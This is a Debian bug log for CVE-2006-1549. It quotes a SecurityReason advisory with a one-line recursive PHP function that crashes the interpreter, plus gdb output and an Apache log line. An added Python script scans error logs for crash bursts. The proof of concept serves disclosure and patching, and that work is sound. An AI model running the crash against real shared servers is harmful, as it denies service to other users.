[CVE-2006-1549] PHP allows local users to cause a crash by defining and executing a recursive function.

Related Vulnerabilities: CVE-2006-1549  

Debian Bug report logs - #361854

Package: php4; Maintainer for php4 is (unknown);

Reported by: Oliver Paulus <oliver@code-project.org>

Date: Mon, 10 Apr 2006 19:33:08 UTC

Severity: important

Tags: security

Found in versions php4/4:4.3.10-16, 4:4.4.2-1.1

Done: sean finney <seanius@seanius.net>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.


Acknowledgement sent to Oliver Paulus <oliver@code-project.org>:
New Bug report received and forwarded. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.


Message #5 received at submit@bugs.debian.org:

From: Oliver Paulus <oliver@code-project.org>
To: submit@bugs.debian.org
Subject: function *() php/apache Crash PHP 4.4.2 and 5.1.2
Date: Mon, 10 Apr 2006 23:14:43 +0200
Package: php4
Version: 4:4.3.10-16
Severity: grave

for more information see:
http://securityreason.com/achievement_securityalert/35

-- 
Oliver Paulus

OpenPGP
Key id: 28D9C44F
Fingerprint: EADA 62FC 07DC 3361 A3D6  4174 2DE3 C027 28D9 C44F
Public Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x28D9C44F



Tags added: security Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.


Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.


Acknowledgement sent to Ondrej Sury <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.


Message #12 received at 361854@bugs.debian.org:

From: Ondrej Sury <ondrej@sury.org>
To: 361854@bugs.debian.org
Subject: Re: [php-maint] Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2
Date: Tue, 11 Apr 2006 10:00:21 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[function *() php/apache Crash PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

- --- 1. function *() Crash ---
PHP4/5 is vulnerable to a local denial-of-service. The general problem is in data allocated to memory.

Example attack:

cxib# php -r 'function cx(){ cx(); } cx();'
Segmentation fault (core dumped)
cxib# 

Segfault. Let's see what we have in gdb:

- ---
cxib# cat /www/functionsegfault.php
<?
function cx(){
cx();
} 
cx();
?>
cxib# gdb -q php
(gdb) r '/www/functionsegfault.php'
Starting program: /usr/local/bin/php '/www/functionsegfault.php'

Program received signal SIGSEGV, Segmentation fault.
0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, 
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such
file or
directory.
in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c
(gdb) bt
#0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, 
__zend_filename=0x811d8c0
"/usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c",
__zend_lineno=1568)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111
#1 0x080f042a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568
#2 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#3 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#4 0x080f019a in execute (op_array=0x81b3880)
at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719
#5 0x080f019a in execute (op_array=0x81b3880)
...
- ---

Or in the Apache error_log:

[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4)

- --- 2. Greets ---

For: sp3x
and
p_e_a, pi3, eax, Infospec ;]

- --- 3. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7
lNzhZke21IHXM0TvvjntXyY=
=Y7Ft
-----END PGP SIGNATURE-----
-- 
Ondrej Sury <ondrej@sury.org>
[signature.asc (application/pgp-signature, inline)]
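
An added example, not part of the bug log or the advisory: a Python scan of an Apache error_log for the child-exit notice quoted above, flagging bursts of workers killed by SIGILL or SIGSEGV so that a recurring interpreter crash stands out from a one-off. Only the first sample line comes from the page; the other lines, the 60-second window and the threshold of 3 are assumptions.

```python
import re
from datetime import datetime, timedelta

# Matches the child-exit notice quoted in the advisory; the optional fractional
# seconds and the lazy ".*?" also accept longer, newer-style line prefixes.
LINE_RE = re.compile(
    r"^\[(?P<ts>\w{3} \w{3} +\d+ [\d:]{8})(?:\.\d+)? (?P<year>\d{4})\].*?"
    r"child pid (?P<pid>\d+) exit signal (?P<name>.+?) \((?P<num>\d+)\)"
)
# Signals seen on this page: SIGILL in error_log, SIGSEGV on the command line.
WATCHED = {4: "SIGILL", 11: "SIGSEGV"}

def parse_crashes(lines):
    """Return one dict per worker that died from a watched signal."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or int(m["num"]) not in WATCHED:
            continue
        when = datetime.strptime(f"{m['ts']} {m['year']}", "%a %b %d %H:%M:%S %Y")
        events.append({"time": when, "pid": int(m["pid"]),
                       "signal": WATCHED[int(m["num"])]})
    return events

def crash_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Group crashes within `window` of a group's first crash; keep big groups."""
    bursts, group = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if group and ev["time"] - group[0]["time"] > window:
            if len(group) >= threshold:
                bursts.append((group[0]["time"], group[-1]["time"], len(group)))
            group = []
        group.append(ev)
    if len(group) >= threshold:
        bursts.append((group[0]["time"], group[-1]["time"], len(group)))
    return bursts

# First line is the one quoted in the advisory; the rest are constructed.
SAMPLE_LOG = [
    "[Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4)",
    "[Mon Mar 20 12:12:58 2006] [notice] child pid 745 exit signal Segmentation fault (11)",
    "[Mon Mar 20 12:13:01.482133 2006] [core:notice] [pid 700] AH00052: child pid 751 exit signal Segmentation fault (11)",
    "[Mon Mar 20 12:13:05 2006] [error] File does not exist: /www/favicon.ico",
    "[Mon Mar 20 14:40:10 2006] [notice] child pid 802 exit signal Segmentation fault (11)",
]

if __name__ == "__main__":
    for start, end, count in crash_bursts(parse_crashes(SAMPLE_LOG)):
        print(f"{count} worker crashes between {start} and {end}")
```

The isolated crash at 14:40:10 is parsed but not reported, because it never reaches the threshold within one window.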

Bug 361854 cloned as bug 361917. Request was from Ondrej Sury <ondrej@sury.org> to control@bugs.debian.org.


Tags added: security Request was from Ondrej Sury <ondrej@sury.org> to control@bugs.debian.org.


Severity set to `important'. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.


Reply sent to Steve Langasek <vorlon@debian.org>:
You have taken responsibility.


Notification sent to Oliver Paulus <oliver@code-project.org>:
Bug acknowledged by developer.


Message #23 received at 361854-done@bugs.debian.org:

From: Steve Langasek <vorlon@debian.org>
To: Oliver Paulus <oliver@code-project.org>, 361854-done@bugs.debian.org, 361855-done@bugs.debian.org, 361856-done@bugs.debian.org, 361853-done@bugs.debian.org
Subject: Re: Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2
Date: Mon, 10 Apr 2006 22:01:02 -0700
Version: 4:4.4.2-1
severity 361854 important
severity 361855 important
severity 361856 important
thanks

On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/34

On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/35

On Mon, Apr 10, 2006 at 11:16:11PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/36

On Mon, Apr 10, 2006 at 11:17:52PM +0200, Oliver Paulus wrote:
> for more information see:
> http://securityreason.com/achievement_securityalert/37

It is my understanding that all of these bugs are fixed in the etch version
of php4; I'm accordingly marking them as closed.

In addition, except for the cross-site scripting bug, none of these appear
to warrant severity: grave.

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
vorlon@debian.org                                   http://www.debian.org/

Bug marked as found in version 4:4.4.2-1. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org.


Bug marked as not found in version 4:4.4.2-1. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.


Bug marked as fixed in version 4:4.4.2-1, send any further explanations to Oliver Paulus <oliver@code-project.org> Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.


Bug reopened, originator not changed. Request was from Steve Langasek <vorlon@debian.org> to control@bugs.debian.org.


Changed Bug title. Request was from "Michal Pokrywka" <mpokrywka@hoga.pl> to control@bugs.debian.org.


Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361854; Package php4.


Acknowledgement sent to Stefan Fritsch <sf@sfritsch.de>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.


Message #38 received at 361854@bugs.debian.org:

From: Stefan Fritsch <sf@sfritsch.de>
To: 361856@bugs.debian.org, control@bugs.debian.org, 361854@bugs.debian.org
Subject: also not fixed in 4.4.2 but in 4.4.3
Date: Mon, 14 Aug 2006 22:47:04 +0200
found 361856 4:4.4.2-1.1
found 361854 4:4.4.2-1.1
thanks

see
http://secunia.com/advisories/19599/
for #361856

http://www.frsirt.com/english/advisories/2006/1290
for #361854



Bug marked as found in version 4:4.4.2-1.1. Request was from Stefan Fritsch <sf@sfritsch.de> to control@bugs.debian.org.


Bug closed, send any further explanations to Oliver Paulus <oliver@code-project.org> Request was from sean finney <seanius@seanius.net> to control@bugs.debian.org.


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 18 Jun 2007 08:46:13 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 14:04:28 2019; Machine Name: buxtehude
